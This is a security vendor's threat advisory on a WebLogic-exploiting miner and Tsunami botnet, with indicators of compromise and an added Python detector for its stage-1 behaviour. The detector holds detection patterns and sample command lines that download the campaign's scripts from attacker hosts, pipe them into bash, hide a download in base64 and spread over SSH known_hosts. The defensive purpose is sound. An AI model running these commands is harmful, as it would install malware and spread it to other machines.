
Rewterz Threat Alert – Multi-Vector Miner and Tsunami Botnet with SSH Lateral Movement

December 2, 2020

Severity

Medium

Analysis Summary

A botnet has been detected that propagates using an Oracle WebLogic exploit. It carries two payloads: 1) Monero (XMR) miner binaries and 2) Tsunami binaries. The botnet primarily targets cloud servers. In September, an earlier version of the same botnet exploited misconfigured Docker APIs. Interestingly, the current version contains unused code for exploiting Redis and for brute-forcing SSH. The botnet achieves persistence in multiple ways, kills running processes (potentially competing mining tools) and attempts to remove EDR agents. It uses base64-encoded intermediate-stage shell scripts and base64-encoded commands to download and execute Python scripts. Tsunami is added as a second payload alongside the Monero XMR miner.
It exploits the Oracle WebLogic RCE vulnerability CVE-2020-14882. The campaign uses multiple shell scripts and Python scripts with different drop locations and connects to binary-hosting web servers through hard-coded IP addresses and domains.

Stage 1 executes two payloads: a shell script, xms, and a Python script. The xms script is fetched with curl and piped directly into bash; if that fails, it is fetched with wget, executed and then deleted to hinder analysis. The Python script is fetched and executed through base64-encoded commands to evade detection and analysis. The xms script attempts to infect hosts that the compromised server has previously connected to, and lists running processes to gather information about active SSH connections. The XMR miner also targets Windows servers, as evidenced by .exe binaries hosted on the same FTP server.
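The stage-1 tradecraft above (curl piped into bash with a wget fallback, fetch-execute-delete, base64-wrapped download commands, and reuse of hosts the server has already reached over SSH) gives concrete things to hunt for in process-execution telemetry. The script below is an added example, not Rewterz tooling or code from the campaign: it scans command lines such as those recorded by auditd or an EDR, flags those patterns, decodes embedded base64 so the hidden download URL can be inspected, and matches the domains and IPs from the Indicators of Compromise section. The sample command lines are constructed for illustration, not captured from the botnet; the detection patterns and the assumption that targets are harvested from known_hosts, ssh config or shell history are heuristics chosen here, not rules published in the advisory.

```python
"""Heuristic detector for the stage-1 behaviour described in the advisory.

Added example (not Rewterz code): scans process command lines for the
curl/wget-to-shell, fetch-execute-delete, base64-wrapped-command and
SSH-target-harvesting patterns, and checks every host (including ones hidden
inside base64) against the advisory's domain and IP indicators.
"""
import base64
import binascii
import re

# Domains and IPs from the advisory's IoC list (defanging removed).
# icanhazip.com is a public "what is my IP" service; on its own it is a weak
# indicator, so it is kept in the set but should be weighed accordingly.
IOC_HOSTS = {
    "icanhazip.com", "bash.givemexyz.in", "pool.supportxmr.com",
    "xmr.givemexyz.in",
    "205.185.116.78", "66.70.218.40", "209.141.35.17",
    "104.244.75.25", "198.98.57.217", "194.156.99.30",
}
IOC_HOST_RE = re.compile(
    r"(?<![\w.-])(" + "|".join(re.escape(h) for h in sorted(IOC_HOSTS)) + r")(?![\w.-])"
)

# curl/wget output piped straight into a shell or interpreter.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:bash|sh|python[23]?)\b")
# download && run && rm: the wget fallback that deletes the script afterwards.
FETCH_EXEC_RM = re.compile(
    r"\b(?:wget|curl)\b.*&&.*\b(?:bash|sh|python[23]?)\b.*&&\s*rm\b")
# A base64 decode step in the command (shell or Python).
B64_DECODE = re.compile(r"base64\s+(?:-d|--decode)\b|b64decode\(")
# Candidate base64 literals long enough to hide a command.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Files listing hosts this machine has previously reached over SSH
# (assumption: a worm harvests its lateral-movement targets from these).
SSH_HARVEST = re.compile(r"\.ssh/(?:known_hosts|config)|\.bash_history")


def decode_b64_literals(cmd):
    """Return the printable ASCII text of every base64 token embedded in cmd."""
    out = []
    for tok in B64_LITERAL.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not real base64, or binary data: ignore
        if all(c.isprintable() or c in "\n\t" for c in text):
            out.append(text)
    return out


def analyze(cmd):
    """Return an ordered, de-duplicated list of finding tags for one command line."""
    findings = []

    def add(tag):
        if tag not in findings:
            findings.append(tag)

    decoded = decode_b64_literals(cmd)
    if decoded and B64_DECODE.search(cmd):
        add("base64-stage")
    # Inspect the raw line and whatever its base64 payloads decode to, because
    # the download URL of the Python stage is hidden inside the encoding.
    for text in [cmd] + decoded:
        if PIPE_TO_SHELL.search(text):
            add("pipe-to-shell")
        if FETCH_EXEC_RM.search(text):
            add("fetch-exec-delete")
        if SSH_HARVEST.search(text):
            add("ssh-target-harvest")
        for host in IOC_HOST_RE.findall(text):
            add("ioc-host:" + host)
    return findings


def scan(lines):
    """Map each suspicious command line to its findings; clean lines are dropped."""
    hits = {}
    for line in lines:
        findings = analyze(line)
        if findings:
            hits[line] = findings
    return hits


# Constructed sample command lines (not captured from the campaign).
_HIDDEN = base64.b64encode(b"curl -s http://205.185.116.78/b.py | python").decode()
SAMPLE_LOG = [
    "curl -fsSL http://bash.givemexyz.in/xms | bash",
    "wget -q http://205.185.116.78/xms -O /tmp/xms && bash /tmp/xms && rm -f /tmp/xms",
    "echo " + _HIDDEN + " | base64 -d | bash",
    "for h in $(cut -d' ' -f1 ~/.ssh/known_hosts); do "
    "ssh -o StrictHostKeyChecking=no $h 'curl -fsSL http://bash.givemexyz.in/xms | bash'; done",
    "apt-get update && apt-get install -y htop",
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_LOG).items():
        print(", ".join(findings), "<-", line)
```

Feed it auditd EXECVE records or EDR process-creation events with the argv fields joined into one string; the host set should be refreshed as new indicators are published, and the pipe-to-shell pattern will also fire on legitimate installer one-liners, so treat that tag as a lead to triage rather than a verdict on its own.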

Impact

  • Unauthorized Remote Code Execution
  • Unauthorized Access 
  • Process Termination
  • Detection Evasion
  • Unauthorized Resource Consumption 

Indicators of Compromise

Domain Name

  • icanhazip[.]com
  • bash[.]givemexyz[.]in
  • pool[.]supportxmr[.]com
  • xmr[.]givemexyz[.]in

MD5

  • 01581ccc96ce7ccc15205bb859d9e6bd
  • cd7ca50a01fc9c6e8fdc8c3d5e6100f0
  • 8bfc072d37f41190515f8dc00a59fb2e
  • 5954b9c0ee8490f6f1215bace6f6c6e4
  • ee48aa6068988649e41febfa0e3b2169
  • c4d44eed4916675dd408ff0b3562fb1f
  • 5f15d232552301b9e53d597666f610ad
  • 528cfc90fd59af990c2ebc18c0df9b47
  • 790c54d34b09f078a24cf27d6c91740e
  • 9a9a2ffdfa4d2586eef0d1d987b57e9e
  • 8bcf9e1f24093bbf32fbbc3630a0153c
  • eefc0ce93d254982fbbcd26460f3d10d
  • b1fc3486f3f4d3f23fcbf8b8b0522bf8
  • f0551696774f66ad3485445d9e3f7214

SHA-256

  • 72acbfdeadfa31d7ccda7fdcc93944b1948e263239af8850e5b44c518da0a4c5
  • fdc7920b09290b8dedc84c82883b7a1105c2fbad75e42aea4dc165de8e1796e3
  • 35e45d556443c8bf4498d8968ab2a79e751fc2d359bf9f6b4dfd86d417f17cfb
  • 6f7393474c6f3c452513231d1e3fa07ed9dcc8d53a1bb2d680c78e9aa03f8f9d
  • 9b8280f5ce25f1db676db6e79c60c07e61996b2b68efa6d53e017f34cbf9a872
  • 855557e415b485cedb9dc2c6f96d524143108aff2f84497528a8fcddf2dc86a2
  • 22e3611cb2b156c3dc2d192b65707aac7787955d7dc120dfbc09aef8e12251b5
  • b07bf6e14050c1c56c9b80155417370b4704eb0655cfc18bb4259956162c3814
  • 508ec039ca9885f1afc6f15bb70adfa9ed32f9c2d0bff511052edb39898951c7
  • 8dbd281c98c8e176621566e3a77eb8a3b7ae4f254773d56f7033f903dd09a043
  • 030f41373567846ee18716605dea3ef94d1861b9c32b664d25026d41c3557c00
  • 9aa8a11a52b21035ef7badb3f709fa9aa7e757788ad6100b4086f1c6a18c8ab2
  • 1d804c5dfa6da0db4a4465232ad9117003df2ea8f0fc68d9e48700d4373a4568
  • 1225cc15a71886e5b11fca3dc3b4c4bcde39f4c7c9fbce6bad5e4d3ceee21b3a

SHA1

  • 2940e96f15345149143c53143a87fd9dce45d0ac
  • e632f6b93f9e3d3f90ac2068af0b9f1ccee3cd89
  • 2d9600a0697de84522b4e65d9be02b9ed9352b4d
  • 2132c65f23f8e5a3c533bfa4ab73562c476795e0
  • 73c2099c703c9e644172ff58fd49622c06bf2784
  • 57279a4f3ccd3f6abbc2c306682438234241598b
  • 2847609cb04158c6f8e57ec65d63fabc68577a07
  • 9173ca39c025c322864b05a1cd44c022925d7ffc
  • 87fe997bb49499d1f743da9840618e30aeb5d24e
  • 01ebd97e50edc39ade8cefacaffe5bef5c49bf15
  • adaaf46b2bd14a05e58a460e0e2115e696c182fa
  • bae9b44362654ef283cbd197bca4d2b3aca8868d
  • 7bfa2404bc9733205d2374b92fb3ebf57410228f
  • d5f53aa9b9e9899fa511b199230159dfbf215dad

Source IP

  • 205[.]185[.]116[.]78
  • 66[.]70[.]218[.]40
  • 209[.]141[.]35[.]17
  • 104[.]244[.]75[.]25
  • 198[.]98[.]57[.]217
  • 194[.]156[.]99[.]30

URL

  • http[:]//205[.]185[.]116[.]78/b[.]py
  • http[:]//bash[.]givemexyz[.]in/dd[.]py

Remediation

  • Block the threat indicators listed above at their respective controls.
  • Keep all systems and software updated to the latest patched versions; in particular, apply the Oracle patch for CVE-2020-14882 on Internet-facing WebLogic servers.
  • Maintain a strong password policy and enable multi-factor authentication where possible.
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.